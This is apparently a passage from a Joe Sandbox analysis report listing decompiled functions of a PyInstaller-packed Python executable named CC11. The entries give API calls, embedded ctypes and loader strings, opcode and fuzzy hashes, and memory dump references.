                                                                                                                                                                  • Opcode ID: 7ccca54be5616b242e0a439406719945fb519f7f527055ac9e68d89d2586da33
                                                                                                                                                                  • Instruction ID: 919791c012086414eff86397576ae367676263872bc5282554837bec9f2b4a43
                                                                                                                                                                  • Opcode Fuzzy Hash: 7ccca54be5616b242e0a439406719945fb519f7f527055ac9e68d89d2586da33
                                                                                                                                                                  • Instruction Fuzzy Hash: 63615C66A09B4681EE549F9AE8402786BA1FF84FC4F088432DF0E47BA9DF3CE454C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$Dealloc$StringUnraisableWrite$AttrBlockClearFromImportImport_InternLongLong_ModuleObject_OccurredUnicode_
                                                                                                                                                                  • String ID: DllCanUnloadNow$_ctypes.DllCanUnloadNow$ctypes
                                                                                                                                                                  • API String ID: 3204538840-4136862661
                                                                                                                                                                  • Opcode ID: e5f9706139b700ebf3836e30170918d6d26f8e0498e862d4720c226ccd4189c0
                                                                                                                                                                  • Instruction ID: cb49acc2483c42fe3b5bd88a9e11b838eb57beeb980e9d9b9a587dc34c130b60
                                                                                                                                                                  • Opcode Fuzzy Hash: e5f9706139b700ebf3836e30170918d6d26f8e0498e862d4720c226ccd4189c0
                                                                                                                                                                  • Instruction Fuzzy Hash: 7021E965F0EA4781EE549FEDF99427867A1AF88BD5F084038CB0E47766EF6CA444C300
                                                                                                                                                                  APIs
                                                                                                                                                                  • PyTuple_New.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78B32
                                                                                                                                                                  • PyLong_AsUnsignedLongMask.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78BB4
                                                                                                                                                                  • PyErr_Format.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78CCC
                                                                                                                                                                  • _Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78CDD
                                                                                                                                                                  • PyTuple_GetSlice.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78E38
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Tuple_$DeallocErr_FormatLongLong_MaskSliceUnsigned
                                                                                                                                                                  • String ID: %s 'out' parameter must be passed as default value$NULL stgdict unexpected$call takes exactly %d arguments (%zd given)$paramflag %u not yet implemented
                                                                                                                                                                  • API String ID: 3242343960-2588965191
                                                                                                                                                                  • Opcode ID: c3d25f6ff976ab77f80a9ea2e4cc46bf2b90c6acbe4a17057b8ead6a7b4d00b8
                                                                                                                                                                  • Instruction ID: 077eb5af6bb340e237d3818771cb770b4b3d677f9e822e3ecbb534f27f7207d4
                                                                                                                                                                  • Opcode Fuzzy Hash: c3d25f6ff976ab77f80a9ea2e4cc46bf2b90c6acbe4a17057b8ead6a7b4d00b8
                                                                                                                                                                  • Instruction Fuzzy Hash: FAA14A76A09B8285EB61CF9AE8402B977A4FB89BC4F244036DB4E87B55DF3CE455C700
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message
                                                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                  • API String ID: 2030045667-1550345328
                                                                                                                                                                  • Opcode ID: 1bbf565b463eea6d97fbed96aab16e070d09f43d1a6955e35246163c6ac7f0b6
                                                                                                                                                                  • Instruction ID: ee742e4f6f097153597633819966c6b8083df9f4d1c47e0dab09a000bea35550
                                                                                                                                                                  • Opcode Fuzzy Hash: 1bbf565b463eea6d97fbed96aab16e070d09f43d1a6955e35246163c6ac7f0b6
                                                                                                                                                                  • Instruction Fuzzy Hash: 3951AC21B0CA43A2EA759B35A8405B923A5FF88B9CF4441B1EE1C877DDEF3CE5558700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeallocItem$Err_$Dict_ErrorOccurredSequence_With$AttrFormatObject_
                                                                                                                                                                  • String ID: duplicate values for field %R
                                                                                                                                                                  • API String ID: 520049408-1910533534
                                                                                                                                                                  • Opcode ID: 63eb75f7de272bfca248c975c6237f03e04b0ca255ec1df21ccee52375a0f8c8
                                                                                                                                                                  • Instruction ID: abc7b1ecd865c5259e85cae8d9a9a5b4b89fb7aecb3bb5b2f2a167e02c0b8fef
                                                                                                                                                                  • Opcode Fuzzy Hash: 63eb75f7de272bfca248c975c6237f03e04b0ca255ec1df21ccee52375a0f8c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A51A421B0AB4280EE149FAEA84457967A0BF85FE4F048631CF6D477A9EE3CE441C700
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,00007FF690017C97,?,?,FFFFFFFF,00007FF690013834), ref: 00007FF69001782C
                                                                                                                                                                    • Part of subcall function 00007FF6900126C0: MessageBoxW.USER32 ref: 00007FF690012736
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                  • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                  • API String ID: 1662231829-930877121
                                                                                                                                                                  • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                  • Instruction ID: ac90fb5e6628dfd6d958615af6f094d653f8b4ea7023b876f7e75e277221f3af
                                                                                                                                                                  • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                  • Instruction Fuzzy Hash: 8041A321B1C643B1FBB1AB34E8556BA6261EF8878CF4444B2E64EC27DDEE3CE5458700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$FormatMem_$Arg_MallocMemoryParseReallocStringTuplememcpymemset
                                                                                                                                                                  • String ID: Memory cannot be resized because this object doesn't own it$On:resize$excepted ctypes instance$minimum size is %zd
                                                                                                                                                                  • API String ID: 1724287917-828838525
                                                                                                                                                                  • Opcode ID: ad00693b1f41e5ca7e3484ef3154eacaae73e7bba493512c86e3f1556b94f2bf
                                                                                                                                                                  • Instruction ID: f1052349de0dac9328467a31a9d0eaa9b985b87eba8867e6922c6e7ad86adf96
                                                                                                                                                                  • Opcode Fuzzy Hash: ad00693b1f41e5ca7e3484ef3154eacaae73e7bba493512c86e3f1556b94f2bf
                                                                                                                                                                  • Instruction Fuzzy Hash: 69411765A09B0685EB289F9AE8500B93BA1FF88FD8B051532DB0E47B65DE3CE484C341
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_fastfail__scrt_release_startup_lock$__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_uninitialize_crt
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 627783611-0
                                                                                                                                                                  • Opcode ID: 0ebd8746482718f53aaa09db22ff1335a23d4f0a5baafc4d55a168c058cf6849
                                                                                                                                                                  • Instruction ID: 7891d1fb8e339a02661110510303bff4fa15abcf3a8cefa02ad0bb15945b2781
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ebd8746482718f53aaa09db22ff1335a23d4f0a5baafc4d55a168c058cf6849
                                                                                                                                                                  • Instruction Fuzzy Hash: BF91CE21F0C64786FB54ABEE9481AB92B92EF857C0F149439DB1D47797EE3CE8458700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: SubtypeType_$DeallocObject_$AttrErr_InstanceLookupStringUnicode_
                                                                                                                                                                  • String ID: P$wrong type
                                                                                                                                                                  • API String ID: 1377076302-281217272
                                                                                                                                                                  • Opcode ID: 978eeed2b6b77deb299817cca6917130e5b22cb48f60c1b97f36ef281d6ad2ee
                                                                                                                                                                  • Instruction ID: 33c9d93824bb77a32224dd51c25c8dc9872b69191897d00d59c22755253672a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 978eeed2b6b77deb299817cca6917130e5b22cb48f60c1b97f36ef281d6ad2ee
                                                                                                                                                                  • Instruction Fuzzy Hash: ED815BA1A0DA4380FB549F9DD8502792BA0EF95FC4F488439CB4E87BA5EF2CE944C340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Free$String$Eval_Thread$BuildDeallocErr_ErrorFromInfoLocalObjectProgRestoreSaveValue
                                                                                                                                                                  • String ID: iu(uuuiu)
                                                                                                                                                                  • API String ID: 2817777535-1877708109
                                                                                                                                                                  • Opcode ID: e5eff153cfe1cd8670bfd46b16d384ab02d5ebfb2d41f94c074ba4d46b02b2fa
                                                                                                                                                                  • Instruction ID: cdfca94620beeaaf7bc45340b150aecdac6bbc0c622d405c3131742252941f6b
                                                                                                                                                                  • Opcode Fuzzy Hash: e5eff153cfe1cd8670bfd46b16d384ab02d5ebfb2d41f94c074ba4d46b02b2fa
                                                                                                                                                                  • Instruction Fuzzy Hash: 7651C666B05A469AEB00DFA9D4943AC27B0FB88FD9F004536DE0E57B59DF38D509C340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$Dict_ErrorItemOccurredWith$AttrLookupObject_$Callable_CheckLongLong_MaskSequence_StringTupleTuple_Unsigned
                                                                                                                                                                  • String ID: _restype_ must be a type, a callable, or None$class must define _flags_ which must be an integer
                                                                                                                                                                  • API String ID: 3087875697-2538317290
                                                                                                                                                                  • Opcode ID: a650ae08d96c4e209c106faa92d77aba7b425a04122475ea6e6e737c462934a6
                                                                                                                                                                  • Instruction ID: 9cea2c11e74edbe759cf6138db513b37c87d4a6a0f2410f80b56711187ebc347
                                                                                                                                                                  • Opcode Fuzzy Hash: a650ae08d96c4e209c106faa92d77aba7b425a04122475ea6e6e737c462934a6
                                                                                                                                                                  • Instruction Fuzzy Hash: 8D410A21A0AB4291FA559FA9E94437877A4FF84BC4F185235CB5D477A1EF3CE4A4C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc$Err_$AttrFormatLookupObject_OccurredSequence_StringTupleTuple_
                                                                                                                                                                  • String ID: _argtypes_ must be a sequence of types$item %zd in _argtypes_ has no from_param method
                                                                                                                                                                  • API String ID: 846282434-3063448601
                                                                                                                                                                  • Opcode ID: 3ff5ebf6d040ac514a47d7c7f21607858fbd491d35113fefa722fe6b848f6617
                                                                                                                                                                  • Instruction ID: 71fa135adfdce474c90e7f93592d3350f4d47b289dd0495fad75e520d896df02
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ff5ebf6d040ac514a47d7c7f21607858fbd491d35113fefa722fe6b848f6617
                                                                                                                                                                  • Instruction Fuzzy Hash: E7313832A0AA43D5EB54AFAEE8440B96BA4EF85BD5F084131CB0E46B65DF3DE455C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$Number_OccurredSsize_tString
                                                                                                                                                                  • String ID: Array does not support item deletion$Can only assign sequence of same size$indices must be integer
                                                                                                                                                                  • API String ID: 3815977620-3643249925
                                                                                                                                                                  • Opcode ID: 6b6318933739b3b075ee83dfb703e90efbd664ea45f1749ba5fa0166e0716b41
                                                                                                                                                                  • Instruction ID: f5d11ed6aa4d98bf11032ca4cf4aeea72cd2e93fbb44778b3dcc161b257d5e8c
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b6318933739b3b075ee83dfb703e90efbd664ea45f1749ba5fa0166e0716b41
                                                                                                                                                                  • Instruction Fuzzy Hash: E3414B66A09A8291FE548FEAD8401B96B61FF84BE8F044532DF1E47795EE3CE485C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$Buffer_ReleaseString$Arg_FormatParseSizeTuple_memcpy
                                                                                                                                                                  • String ID: Buffer size too small (%zd instead of at least %zd bytes)$abstract class$offset cannot be negative$y*|n:from_buffer_copy
                                                                                                                                                                  • API String ID: 1815618437-871501202
                                                                                                                                                                  • Opcode ID: 03d886769cc6716227b8711dd5de20201db812fee66a2c828ced65105659bb97
                                                                                                                                                                  • Instruction ID: 2f1d948b09bee3edaee4307353a05afe1d3db374466fb688c161e45da43723b5
                                                                                                                                                                  • Opcode Fuzzy Hash: 03d886769cc6716227b8711dd5de20201db812fee66a2c828ced65105659bb97
                                                                                                                                                                  • Instruction Fuzzy Hash: 91310665B19B8681EB20DFAEE8901B967A0FBC8FC4B544032DB5E87B65DE3CE505C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                  • String ID: P%
                                                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                                                  • Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                                                                                  • Instruction ID: 3d794453b29d6e52b5fef5efc14075ca947aac606ac034f791f3d8966fb337e9
                                                                                                                                                                  • Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A510726604BA186D6349F36E4185BAB7A2FB98B65F004131EFDE83789DF3CD085CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FromStringUnicode_
                                                                                                                                                                  • String ID: <cparam '%c' (%I64d)>$<cparam '%c' (%d)>$<cparam '%c' (%f)>$<cparam '%c' (%ld)>$<cparam '%c' (%p)>$<cparam '%c' ('%c')>$<cparam '%c' ('\x%02x')>$<cparam '%c' at %p>$<cparam 0x%02x at %p>
                                                                                                                                                                  • API String ID: 2818169177-1032293993
                                                                                                                                                                  • Opcode ID: 8e7886e10174158f50e63f1f00364b570f2f82a2db45fe417b6a369fba985387
                                                                                                                                                                  • Instruction ID: dfe6f6c113994ba1d5c743bda7a889ee83ce2945c9cf3b9d079f3e323818a1a5
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e7886e10174158f50e63f1f00364b570f2f82a2db45fe417b6a369fba985387
                                                                                                                                                                  • Instruction Fuzzy Hash: EA41AF62A1D54385E7799FBCE8545792F71FF897C8F980232D78E068A9EE2CE905C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
